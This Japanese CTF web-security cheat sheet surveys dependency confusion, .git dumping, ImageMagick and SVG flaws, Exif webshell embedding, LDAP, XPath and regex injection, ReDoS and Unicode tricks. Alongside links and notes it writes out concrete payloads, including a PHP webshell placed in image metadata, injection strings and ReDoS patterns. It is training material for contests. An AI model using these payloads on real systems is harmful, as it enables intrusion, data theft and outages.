この記事はCTFのWebセキュリティ Advent Calendar 2021の25日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

脆弱性を利用する

• 問題によっては脆弱性を突いた問題がある
  • 時事ネタが多い気がする。ゼロデイやワンデイという感じ
• ソースコードが配布されていて、バージョンが固定されたライブラリを使っているなら怪しい

Dependency Confusion

• Dependency Confusion: How I Hacked Into Apple, Microsoft and Dozens of Other Companies | by Alex Birsan | Feb, 2021 | Medium
  • 発祥の地
• 対象
  • レポジトリシステム, Maven Central(Gradleも？), npm, NuGet, PyPl
• AzureのWhite paper
  • 各レポジトリでのmitigationも書いてある
• Preventing Dependency Confusion in PHP with Composer
  • PHPでの話
• Change methodology for installing Helix scripts to ensure we get the … · dotnet/dotnet-buildtools-prereqs-docker@56c6673 · GitHub
  • --extra-index-urlで指定されていても一般公開されているもののバージョンが高ければ、そっちがとってこられる
• PoC？チェックツール？
  • https://github.com/visma-prodsec/confused
• Challenges
  • CTFtime.org / H@cktivityCon 2021 CTF / SpiralCI
    • 初めて題材になっているのを見た
    • パッケージをnpmに公開する方法（業界のやり方）| Zell Liewで作れる
    • packages.jsonでscruptsの所にpreinstallとして任意コードを配置しておくとRCEできる。今回はログ出力もされているので、標準出力に出してやれば見られる

DoS

• セキュリティ的にも問題とされる。情報は抜かれないが、事業停止に追いやることができる。CTFではあまりテーマとして出題されない。
  • でも解法でDoSが思いついても、解法にかなり確信度が無い限りやらないことを勧める（もしかしたらサーバ壊すかも）
• 何がDoSの原因となるか？
  • 再帰的な構造があるもの
  • 指数関数的に伸びる可能性があるもの
    • jsonのparseとか（深さが深いとバッファが食われる）
  • 受け付けるサイズの上限がない場合
  • 格安ホスティングにより、ほかの人がDoSを受けると影響を受ける
  • エラーを起こすような入力を与えることで、StoredXSSの要領でそのページを開くときに毎回エラーを発生させて、画面表示させないようにできる
• 資料
  • DDoS攻撃を解説—その原因、影響、サイトを保護する方法とは？

Git系

• /.gitを試してみて、404以外だったら抜けるか試してみる
• バージョン管理情報も一緒にアップロードされてるときに情報を抜ける
  • 【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
• ネット上に上がっているレポジトリを持ってくるとき
  • GitHub - arthaud/git-dumper: A tool to dump a git repository from a website
    • ./git-dumper.py http://website.com/.git ~/website
  • GitHub - C-Sto/GoGitDumper: Dump exposed HTTP .git fast
    • gogitdumper -u https://constellations.page/.git/ -o .git/
• Gitのファイルがありそうなとき
  • /home/gitserver/.git/HEADを見てみる
  • /home/gitserver/.git/logs/HEADで修正ログが見られる
• テク
  • Gitでやらかした時に使える19個の奥義 - Qiita
  • git log
    • git log -p
      • 修正内容も含めて全部持ってくる
    • git log -p > log && cat log | grep -Ei "flag{"
      • flag{を抽出するコマンド
    • > git log --oneline --stat > log.txt
      • いい感じのlogを出すコマンド
  • git rev-list --objects --all
    • 過去コミットのオブジェクトを全部持ってくる
    • git cat-file --batch --batch-all-objectsで全部表示できる
  • CTFtime.org / RITSEC CTF 2021 / Corruption
    • 壊れてるっぽいけど、頑張って復元してる

SVGへの攻撃方法

ImageMagick

• 画像処理ライブラリ。
• 脆弱性が多い
  • 2016年：ImageTragick (CVE-2016-3714 ～ CVE-2016-3718)
    • 「ImageMagick」の脆弱性、遠隔でのコード実行が可能に | トレンドマイクロ セキュリティブログ
    • RCE。MVG(ImageMagickの独自規格) やSVGといったベクター画像にコマンドを埋めこんで実行する。
    • exploitコード：ImageTragick
    • #402362 RCE due to ImageTragick v2
      • ghostscript RCEが使える脆弱性があるらしい
    • MDL Considered Harmful - CTFs
      • jsonからの入力例で攻撃成功しているものがある（LFI）
      • テキスト入れるところに@/opt/flag.txtと置くとLFIできる
  • 2017年：Yahoobleed
    • メモリ初期化漏れ
    • PoCしてないので違う可能性あり
    • メモリ解放後の領域を盗み見ることで、情報をリークさせるもの
    • Yahoobleed - YoyaWiki Plus!
  • 2016, 2018年：Tavis OrmandyによるImageMagickでの外部プログラム（Ghostscript）のサポートがどのようにリモート実行につながるかを示す
    • InsertScript: ImageMagick - Shell injection via PDF passwordで言及
  • 2020年：ImageMagick-PDFパスワードによるシェルインジェクション
    • InsertScript: ImageMagick - Shell injection via PDF password
    • PDF作成時の設定パスワード部分でシェルインジェクションが行える
    • これはCLI実行時もそうであるが、MSL形式経由でパスワードを指定しても同様のコマンドインジェクションが達成できる
• 気になること
  • ImageMagickでは、次の構文を使用して特定のハンドラーを設定することもできます。convert msvg:test.svg out.png
    • これは考慮されてない場合多そう
• 対策について
  • ImageMagickを使うWebアプリのセキュリティ - 1. 既知の脆弱性、システム情報の漏洩 | MBSD Blog
  • 「さようなら ImageMagick」の考察 - Qiita
  • アップロード画像による Web サイト乗っ取りが可能な脆弱性とその対策 – Naked Security
• InsertScript: ImageMagick - Shell injection via PDF password
  • odt:/etc/passwd, html:/etc/passwdとするやりかたもある
• 資料
  • ImageMagickを使うWebアプリのセキュリティ - 1. 既知の脆弱性、システム情報の漏洩 | MBSD Blog

GraphicsMagick

• コマンドインジェクションできる場合に属性とかで悪さができる。
• HackerOneに報告された脆弱性をHackEDUで再現する - Akaki I/O
  • -rotate 90を差し込んで回転するか確認（これはImageMagickでも有効らしい）

SVG Writeups

• 【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
• 【2019年】CTF Web問題の攻撃手法まとめ (Web問題のwriteupぜんぶ読む) - こんとろーるしーこんとろーるぶい
• CTFtime.org / P.W.N. CTF / SVG2PNG / Writeup
• 0CTF/TCTF 2018 Quals h4x0rs.space Writeup (Web 1000)
• X-CTF Finals 2016 - John Slick (Web 25) – Quan Yang
• Midnight Sun CTF 2019 Quals - Rubenscube | JBZ CTF Team
• BsidesSF CTF 2019 - svgmagick | Root Network Security
• GoogleCTF 2019 GPhotos writeup

Exif

• ExifTool において DjVu 形式ファイルの検証不備により任意のコードが実行されてしまう脆弱性（Scan Tech Report） | ScanNetSecurity
• exiftoolを使って、メタデータに悪意のある入力を埋め込む
  • exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); >?' pic.jpg
• アップロード時にgeo-location情報は削除すべき？
  • Exif Data Exposure. Summary : | by Jerry Shah (Jerry) | Medium

LDAP

• LDAPが裏で動いているかの確認
  • 検索フォームで以下のような感じなら怪しい
    • *で検索すると全部でてくる
    • (で検索するとエラーになる
      • エラー例 Error: {'result': -7, 'desc': 'Bad search filter', 'errno': 11, 'ctrls': [], 'info': 'Resource temporarily unavailable'}
  • emailがXXX@YYY.localなら怪しい
• LDAP Filter Injection
  • Understanding and Defending Against LDAP Injection Attacks – LDAP.com
  • String filter = "(|(uid=" + userInput + ")(mail=" + userInput + "))";
    • こんな感じにフィルターを作っていた場合にインジェクションできるよという話。
    • ルールはこんなかんじ7.4 LDAP検索フィルタ
    • 使える属性 マッピング可能なLDAP属性（データベース連携） | ADManager Plus ナレッジベース
      • ある問題ではdescriptionにヒントが書いてあったパターンがある（パスワードがそのまま書いてある場合も）
  • どう悪用するかというと、
    • String filter = "(|(displayName=" + userInput + ")";こうなってたとする
    • これにAdmin*)(description=V*のように違う属性をインジェクションして、ワイルドカードで検索することで、表示されるされないでブラインドSQLiをして、descriptionの情報を抜き取れる
  • payload
    • mkiloa@dvctf.local)(description=*))%00&password=*
  • 総当りで一桁ずつ当てる方法がある
    • ユーザー名、OIDは全探索できる？
      • DaVinciCTF — Web Challenges — Writeup | by FHantke | Mar, 2021 | InfoSec Write-ups
        • email=mkiloa@dvctf.local)(userPassword:2.5.13.18:=\7b\4d\44\35\7d\41\<add the next byte here>))%00&password=*
      • Write Up : ECW 2018 - AdmYSsion · 0xUKN - (in)Security Blog
• 問題
  • CTFtime.org / HacktivityCon CTF / Lightweight Contact Book

Reflected File Download

• RFD Vulnerability And Content-Disposition Header Bypass Story! | by Kabilan S | Jul, 2021 | Medium

正規表現

• 正規表現によるバリデーションはバイパスできる可能性が高い
  • シンプルでない正規表現はバイパス検討してみよう
  • 改行、大文字小文字、文字コード、普通に書き間違えて先頭・末尾指定が無いとか
• regex - Difference between \A \z and ^ $ in Ruby regular expressions - Stack Overflow
  • 先頭末尾は^ ... $とするか\A ... \zとするかの選択肢があるが、後者の方が強い制約になる。\zと\Zはセキュリティ的にはそんなに変りない。
• re.sub(r'([^_\.\sa-zA-Z0-9])', r'\\\1', s)
  • とやると\nは変換されない
• regexpパズル
  • CTFtime.org / THC CTF 2021 / Expressive Expressions

ReDoS

• ReDoSとは
  • Regular Expression DoS The Regular Expression Denial of Service (ReDoS) cheat-sheet | by James Davis | May, 2020 | Level Up Coding
  • 正規表現を使ったDoS手法
  • 正規表現に入力が入る場合は疑ってもいいかも
  • 日本語資料が最近沢山ある
    • その正規表現、異議あり！ 〜 ReDoSについて - Speaker Deck
    • ^ReDoSの色々$ - Speaker Deck
  • 正規表現ソルバの実装によっては最悪計算量が指数関数になる場合があり、最悪計算量となるように評価式を作ることで、サーバに負荷をかけることができる
    • Algorithmic complexity attack - Wikipedia
    • こういう分野らしい。ZIP爆弾とかもそうなのか
  • 正規表現の評価時にありうるパターンを全探索することで、組合せ爆発が起こるために発生する
  • メールアドレスでのReDoS
    • 正規表現でのメールアドレスチェックは見直すべき – ReDoS – yohgaki's blog
    • 例）secconbeginner@host.abcde.abcde.abcde.abcde.abcde.abcde.abcde.abcde.abcde.abcde.
• google/re2: RE2 is a fast, safe, thread-friendly alternative to backtracking regular expression engines like those used in PCRE, Perl, and Python. It is a C++ library.
  • Google作の安全な正規表現ソルバ。しかし、これを使っていても普通に重い正規表現では重くなる
    • CTFtime.org / TSG CTF 2020 / Slick Logger
  • TSG CTF 2020 作問感想 - 博多電光
    • RE2はAutomaton-basedであり、長い正規表現で状態数を増やせば、単純に計算を重くすることができ、ReDoSっぽいことができる
• ペイロード
  • 正規表現を使ったDoS – ReDoS – yohgaki's blog
  • 正規表現の落とし穴（ReDoS - Regular Expressions DoS） - Qiita
  • ctf-writeups/note2.md at master · mdsnins/ctf-writeups
    • ^TSGCTF.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?!
• 対策方法
  • その正規表現の書き方で大丈夫？ ReDoS 攻撃の怖さと対策方法 | yamory Blog
    • やはり、文字数制限
    • ReDoSは正規表現ライブラリの脆弱性なので、ライブラリの最新化で治ることがある
  • 正規表現が安全であるかツールで確認
    • substack/safe-regex: detect possibly catastrophic, exponential-time regular expressions
• 問題

Blind Regular Expression Injection Attack

聖典：A Rough Idea of Blind Regular Expression Injection Attack – やっていく気持ち
聖典から聖典が生まれていた → Revisiting ReDoS: A Rough Idea of Data Exfiltration by ReDoS and Side-channel Techniques - Speaker Deck

• これは何？
  • ReDoSによるレスポンス遅延をオラクルとしたサイドチャネル攻撃
  • 以下、想像（ちゃんと読んでない）
  • 正規表現にマッチしないと全探索をする必要があって、遅くなる
  • なので、「正規表現にマッチ→正解、マッチしない不正解」となるように正規表現を組み、応答時間を測ることで、情報を1文字ずつ抜き取る
• 問題
  • CTFtime.org / TSG CTF 2020 / Slick Logger
    • ^flag(.?){1000}(.?){1000}(.?){1000}(.?){1000}(.?){1000}...(.?){1000}salt$先頭がflagなら後続評価がされてすごく遅くなる

Unicode

• 正規化を狙った攻撃がある
  • Python 3.7.2の脆弱性
    • 課題 36216: CVE-2019-9636: urlsplit does not handle NFKC normalization - Python tracker
    • https://example.com\uFF03@bing.comにGETすると、https://example.comにアクセスされるがbing.comがホスト名になる
• HostSplit
  • Black Hat USA 2019: 今注目すべき Web セキュリティ関連トピックの解説 - Flatt Security Blog
  • ℀を使ったホスト偽装
• Unicodeを悪用するホモグラフ攻撃
  • IDNホモグラフアタック用ドメイン生成ツール EvilURL | うざ夫のうざブログ
    • GitHub - UndeadSec/EvilURL: Generate unicode evil domains for IDN Homograph Attack and detect them.
      • punycodeによる無茶苦茶判別しにくい見た目一緒なドメインを作るツール
    • IDNとはInternationalized Domain Name
    • 実際こういったドメインが必要なのはまれなので、社内プロキシでpunycodeは一律弾いてもいいのでは
      • xn--で始まるDNSクエリはログを記録し、モニタリングしておくのもいい
  • Unicodeで絶対知っておくべきセキュリティ5つの注意（翻訳）｜TechRacho（テックラッチョ）〜エンジニアの「？」を「！」に〜｜BPS株式会社
    • Creative usernames and Spotify account hijacking : Spotify Engineering
• 怪しい文字列を打ちたいとき
  • IncognitoCTF/AstralPlane.md at main · Class-3E/IncognitoCTF · GitHub
  • 2文字で表現している

XPath Injection

• picoCTF2021 [Web Exploitation] writeup - 好奇心の足跡
  • かなり良質なWriteup
  • ユーザーblah' or 1=1 or 'a'='aパスblahを試してみて成功すればXPATHiっぽい
    • //Users[UserName/text()='username' And Password/text()='password']となってるイメージ
  • Blind SQLiっぽい感じにBlind XPath Injectionもできる
    • そのためにはsubstringを取る必要があり、そのためにかカラム名が必要になる
      • それも長さとかguessとか諸々頑張るとできる
      • カラム名がわかったらsubstringで1つずつ特定していく
    • Cyber Apocalypse CTF 2021 Writeup | y011d4.log
• CTFtime.org / Cyber Apocalypse 2021 / E.Tree
  • 適当にエラーを出したときにlxml.etree.XPathEvalErrorが出たらチャンス
  • /militaty/distinct/staff[name='[userinput]']というクエリの場合は
    • x' or 任意条件 or 'x'='yみたいにインジェクションすると任意条件が満たされれば出てきて、そうでないなら出てこないようにできる
    • あとはstarts-withを使って先頭から順番に文字を探していく x' or //staff[starts-with(selfDestructCode, '{flagAttempt}')] or 'x'='y
  • 他インジェクション例
    • "a'] or substring((//staff[position()=2]/selfDestructCode/text()),1,1)='4' or /staf[nam='a
    • ' OR count(//selfDestructCode)=2 OR 'a'='
• 未分類
  • XPATH Injection : Iterating through element and Entities
  • Basics XPATH Injection
  • Basics of XPATH for XPATH Injection 1
  • Basics of XPATH for XPATH Injection 2